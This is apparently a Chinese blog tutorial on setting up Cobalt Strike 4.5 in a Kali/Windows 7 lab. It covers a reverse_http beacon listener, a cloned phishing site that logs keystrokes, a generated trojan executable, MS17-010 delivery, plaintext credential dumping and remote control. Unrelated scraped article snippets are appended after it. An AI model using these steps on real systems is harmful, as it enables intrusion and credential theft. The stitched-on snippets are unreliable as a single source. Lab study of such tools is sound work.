关于一些网络安全实战内容,我还是不厌其烦的写上这些忠告,请见谅。
以下内容摘自《Metasploit渗透测试指南》
作为一名渗透测试者,我们可以击败安全防御机制,但这是仅仅是我们工作的一部分。当你进行渗透攻击时,请记住如下的忠告:
不要进行恶意的攻击;
不要做傻事;
在没有获得书面授权时,不要攻击任何目标;
考虑你的行为将会带来的后果;
如果你干了些非法的事情,天网恢恢疏而不漏,你总会被抓到牢里的。
Cobalt Strike一款以由美国redteam团队,研发出来的一款以Metasploit为基础的GUI框架式渗透测试工具。它是一款基于java的渗透测试神器, 常被业界人称为CS, 也被戏称为“线上多人运动平台 ” 。
Cobalt Strike集成了端口转发、 扫描多模式端口Listener、 Windows exe程序生成、Windows dll动态链接库生成、java程序生成、 office宏代码生成, 包括站点克隆获取浏览器的相关信息等。
CS使用了C/S架构,分为客户端和服务端, 服务端只要一个,客户端可有多个,多人连接服务端后可协同测试,与其他人分享shell。C/S结构通常采取两层结构。 服务器负责数据的管理, 客户机负责完成与用户的交互任务。前提需要知道IP和密码。
kali-linux系统,IP:192.168.242.4
win7系统,IP:192.168.242.6
可以先在自己本机上解压cobal_strike_4.5.zip后复制到kali系统,或压缩包直接复制到kali系统,再用解压。
注意:解压完看下,是不是10个文件/文件夹,如果不等于10个,文件包可能损坏或异常。
解压命令:unzip FileName.zip
# 切换到目录coablt_strike_4.5
cd coablt_strike_4.5
# 赋与读写权限
chmod 777 *
# 确认权限是否赋与
ll
# 结果与预期值一致
总用量 33864
-rwxrwxrwx 1 777 kali 257 6月 9 2022 agscript
-rwxrwxrwx 1 777 kali 220 6月 9 2022 c2lint
-rwxrwxrwx 1 777 kali 214 6月 9 2022 cobaltstrike
-rwxrwxrwx 1 777 kali 165 6月 9 2022 cobaltstrike.bat
-rwxrwxrwx 1 777 kali 33842513 4月 30 2022 cobaltstrike.jar
-rwxrwxrwx 1 777 kali 791099 6月 9 2022 CSAgent.jar
-rwxrwxrwx 1 777 kali 217 6月 9 2022 peclone
drwxrwxrwx 2 777 kali 4096 9月 10 09:51 resources
drwxrwxrwx 2 777 kali 4096 9月 10 09:51 scripts
-rwxrwxrwx 1 777 kali 1981 6月 9 2022 teamserver
# cs 设置ip,密码, ip为kali系统的ip
./teamserver 192.168.242.4 123
# 启动成功的信息
[*] Will use existing X509 certificate and keystore (for SSL)
[+] Team server is up on 0.0.0.0:50050
[*] SHA256 hash of SSL cert is: 794e7a6fe6e6386d1621e4c98df30be2e426db3491ebfad99eb3fede3030b73d
注意:新开一个控制台,一样切换到root用户角色,sudo su,输入密码
# 切换到目录coablt_strike_4.5
cd coablt_strike_4.5
# 执行命令
./cobaltstrike
弹出连接界面,如下:
各项说明
别名:可以随意设置
主机:IP为服务器(kali)的IP
端口:在CS启动的时候可以看见端口号:50050
用户:为登录之后给别人看的名字,任意写
密码:为之前设置的密码,123
点连接,成功界面如下:
在CS客户端可视化界面操作,步骤:点击左上方CobaltStrike选项——>在下拉 框中选择 监听器——>在下方弹出区域 中点击添加
点击添加后,设置监听端口参数
添加成功
在CS服务端的会出现1行结果
[+] Listener: listen01 started!
在CS客户端的会出现3行结果
[*] Payload is 'windows/beacon_http/reverse_http' and {proxy=, payload=windows/beacon_http/reverse_http, port=80, profile=default, name=listen01, host=192.168.242.4, althost=, strategy=round-robin, maxretry=none, beacons=192.168.242.6, bindto=}
[*] Finalized: aggressor.dialogs.ScListenerDialog
[*] Finalized: aggressor.dialogs.ScListenerDialog
点击攻击选项,选择Web钓鱼—>网站克隆
克隆Url: http://xxx(注意:只能克隆http的网站,克隆不了https是有安全加密的网站)
克隆成功
任意敲击键盘,通过访问视图的web日志选项,可以知道键盘监听的结果。
在win7系统访问:http://192.168.242.4:80/ ,并输入内容
kali系统查看web日志
操作步骤:选择攻击模块–生成后门–下面的 windows可执行程序。
选择监听器,并且勾选下面的使用64 payload
注意:新增一个监听器,端口不要使用80,其他没使用的端口即可,这里使用8081
生成成功
先把上面制作的木马程序复制到本机,再复制到win7系统,然后双击木马,然后CS就会显示上线了。注意要关闭杀毒软件和防火墙。
另外一种方式:就是利用win7漏洞ms17-010攻击,然后使用upload命令上传到win7系统。
win7系统看任务管理器已经有运行木马程序了
kali系统的CS-web日志,增加记录,在列表出现靶机
右键点击上线的靶机,选择会话交互,进入命令模式
右键点击上线的靶机,将会话操作中的回连间隔改为0
右键点击凭证提权——>抓取明文密码,获取靶机的用户名和密码,之后可进行远程桌面连接
desktop #远程VNC(虚拟网络控制台)
sleep x #设置睡眠延迟时间
pwd #当前目录位置
ls #列出当前目录下的文件
screenshot #屏幕截图
shell whoami #当前登录到系统的用户名称
点击工具栏的屏幕截图按钮,可以查看执行screenshot截图命令后截取的靶机的图片
如果需要Cobalt Strike包进行实验,请关注我的公众号:大象只为你,后台回复:CS安装包。
双节放假前跟自己说,趁着假期不用上班,早上早起出去户外跑步,天气原因和自己偶尔生病原因断断续续,在家跑步机上跑,跟户外还不太一样。假期的第4天终于在6点半前起床,洗漱后出发去爬山和跑步了。太久没有跑了,第一圈一半时感觉呼吸有点难受,也口干,就暂时放慢下来走了一会再开始跑。坚持跑了两圈,然后买了一瓶水回家。总共跑步37分钟,拉伸7分钟。有时真的应该出去户外运动,带着耳机听音乐,放空自己。
后面分享网安笔记,可能是1天1篇,也可能是2~3天1篇,主要是我自己做笔记跟分享出来还不一样,自己做笔记已经知道上下文了,自己清楚就行,分享出来需要考虑到怎么表达才更通俗易懂,而且有些敏感信息是不可以分享出来的。目前分享这些内容主要是初级内容,后面还会有中级、高阶的。我自己还在学习摸索中,欢迎持续关注我的公众号:大象只为你,文章中有疑问或表达不清楚的地方欢迎留言交流。
文章浏览阅读6.7k次,点赞32次,收藏108次。嵌入式软件自留地 今天编者荐语:五分钟了解物联网SIM卡——这个文章刷新了我对sim卡的认识,不熟悉的可以看看~~以下文章来源于华为云IoT ,作者我是卤蛋这个文章来自网络,看了觉得不错,因此特意整理转载下。是华为iot小助手分享的,都知道华为在物联网领域是国内老大的地位,分享的文章还是比较有价值的。【摘要】SIM卡是移动通信中不可或缺的组成部分,在物联网解决方案中,设备移动上网也需要使用SIM卡。那么,SIM卡是什么?SIM卡有几种?各种SIM卡有什么区别?本文将为您答疑.._中移物联nb-iot模块 不认识sim卡
文章浏览阅读1.1w次。JavaScript 获取当前时间戳:第一种方法:var timestamp = Date.parse(new Date());第二种方法:var timestamp=new Date().getTime();第三种方法:var timestamp = (new Date()).valueOf();第一种:获取的时间戳是把毫秒改成000显示,_js unix时间戳
文章浏览阅读5.1k次。2021-03-18首次编辑Profile文件什么是Profile文件?chrome://version可以查看 个人资料路径书签文件的存贮路径/Users/username/Library/Application Support/Google/Chrome/Default/Bookmarks扩展插件存放位置/Users/username/Library/Application Support/Google/Chrome/Default/Extensions..._chrome 浏览器 网页 pdf 文件 保存在哪里
文章浏览阅读1.4k次,点赞5次,收藏39次。本文章为Java Swing的笔记分享,这一篇就够了_黑马程序员awt代码
文章浏览阅读2.5k次,点赞26次,收藏24次。一.简介1.概念:集成(简称:IDE;英文名:Integrated Development Environment )是用于提供程序开发环境的,一般包括编辑器、和等工具。集成了代码编写功能、分析功能、编译功能、调试功能等一体化的开发软件服务套。具备这一特性的软件或者软件套(组)都可以叫集成开发环境。不理解的小朋友也没事的,就一句话总结:IDE就是可以给我们提供很多必要工具,把一堆工具集成起来,变成了一个软件,我们可以在上面开发各种程序。可以类比成一个医药箱~~~2.举例:如的系列等。_ide
文章浏览阅读55次。原文地址:http://www.cnblogs.com/Twisted-Fate/p/4915184.html最近公司app由于疏忽审核被拒绝了,但是计划是最近两天上线时间紧急,希望能快速审核上线,了解到淘宝里面有加速商店,但是价格真是黑心,首次上线12000元,APP若已经上线的更新5999,据网上了解他们也是编写加急理由,已经无法忍受这种坑爹的赚钱方式,总结了一些加急经历的给与建议,..._加急审app
文章浏览阅读685次,点赞14次,收藏25次。Visual Studio Code 的主要功能之一是其强大的调试支持。VS Code 的内置调试器有助于加速编辑、编译和调试循环。在插件库内搜索python Debugger,安装插件(1)创建debug_learning.py测试文件(2)设置断点(2)启动debug模式(3)debug的各个按钮的介绍以下文档基于内置的 Node.js 调试器,但大多数概念和功能也适用于其他调试器。在阅读有关调试的信息之前,首先创建一个示例Node.js应用程序会很有帮助。您可以按照Node.js演练安_python vs debug
文章浏览阅读112次。Python3.7.7+Django+Mysql5.7+pip list+HBuilderX(Vscode也行)+uni+Vue+Pychram社区版。[附源码]计算机毕业设计Python+uniapp家校通微信小程序rjeuh(程序+lw+远程部署)2. 前端:uni+css+javascript+jQuery+easyUI+highcharts。Django + uni小程序 +Python+Mysql 等等组成,B/S模式等等。该项目含有源码、文档、程序、数据库、配套开发软件、软件安装教程。_家校互通小程序开源
文章浏览阅读1.5w次,点赞5次,收藏31次。需求:想要获取快手短视频app的用户粉丝数声明:本博文只是作为研究学习用途,请不要用于非法、商业用途。写个帖子不容易,转载请说明出处,谢谢首先需要用Fidder抓包工具找到接口地址重点来了,快手所有的接口基本都用到了一个参数sig(数据签名)声明:本博文只是作为研究学习用途,请不要用于非法、商业用途。写个帖子不容易,转载请说明出处,谢谢首先需要用Fidder抓包工具找到接口地址这个过程省略..._java获取快手视频评论数
文章浏览阅读3.3k次,点赞22次,收藏85次。Python是一种高级、通用、解释型编程语言。它具有简单易学的语法和强大的功能,适用于多种应用领域,包括Web开发、数据分析、人工智能和科学计算等。Python拥有庞大的社区支持,且拥有丰富的第三方库和工具,使得开发变得更加高效和便捷。python 语言不仅可以应用到网络编程、游戏开发等领域,还可以在图形图像处理、智能机器人、爬取数据、自动化运维等多方面发挥特长,为开发者提供简约、优雅的编程体验。_python一百天
文章浏览阅读347次。Android是通过FragmentManager来管理Fragment,每次对Fragment进行添加和移除时需要开启事务,通过事务处理这些相应的操作,然后commit事务。在对Fragment进行管理前,需要开启一个事务,如下: FragmentManager fm = getSupportFragmentManager(); FragmentT_fragmentmanager fm=getsupportfragmentmanager();
文章浏览阅读455次。LCD和hdmi切换/home/LCD-show-master 目录下LCD-hdmiLCD35-show时区修改sudo cp /usr/share/zoneinfo/Asia/Shanghai /etc/localtimedate -Rwifi配置cat /etc/wpa_supplicant/wpa_supplica..._hw perfevents: pmu driver, 7 counters available 那个文件